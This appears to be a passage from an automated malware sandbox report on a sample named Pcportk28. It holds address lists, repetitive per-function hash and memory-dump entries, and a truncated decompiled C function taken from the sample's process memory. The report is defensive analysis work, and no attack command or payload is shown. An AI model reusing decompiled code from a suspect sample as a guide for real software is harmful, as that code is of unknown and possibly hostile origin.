                                                0x00406ba7
                                                0x00406ba9
                                                0x00406ba9
                                                0x00406be7
                                                0x00406bee
                                                0x00406bfa
                                                0x00406c03
                                                0x00406c0f
                                                0x00406c1b
                                                0x00406c2c
                                                0x00406c42
                                                0x00406c4a
                                                0x00406c4f
                                                0x00406c53
                                                0x00406c54
                                                0x00406c58
                                                0x00406abb
                                                0x00406abb
                                                0x00406abf
                                                0x00406ac0
                                                0x00406ad4
                                                0x00406ad4

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4607186b42d5b5a5e29d51a271643ac0f3a155742664701c3efe553416da7b46
                                                • Instruction ID: d8fdf74bd154e90eb4e1a68ba4e3c2b7177d9f6105a386f0bf4ccbe95c9ad28f
                                                • Opcode Fuzzy Hash: 4607186b42d5b5a5e29d51a271643ac0f3a155742664701c3efe553416da7b46
                                                • Instruction Fuzzy Hash: 1DD02222B040088AD2150DE8B8402F4F334FB4723CF1423A3D509ABDA193B2C83242C8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040C3FB, Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_Pcportk28.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 438120aef26b49d67c4ae3dfe058a4e197c02dd163ec59c944d3bf86aa6c3256
                                                • Instruction ID: a7faff7bd961c66fc992597b1f76531c32633d1a54af54b7cf4ee455a3c7ac61
                                                • Opcode Fuzzy Hash: 438120aef26b49d67c4ae3dfe058a4e197c02dd163ec59c944d3bf86aa6c3256
                                                • Instruction Fuzzy Hash: 4CC01292E454C4A292152E79BC868B8F724E4E31D57A832E7C908B70069827C41885ED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008510D0, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00850060, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008501D4, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085010C, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00851148, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084F8CC, Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00851930, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084F938, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FAB8, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FA20, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FA50, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FBE8, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FB50, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FC30, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00850C40, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0084FC48, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00851D80, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00878788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00878788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
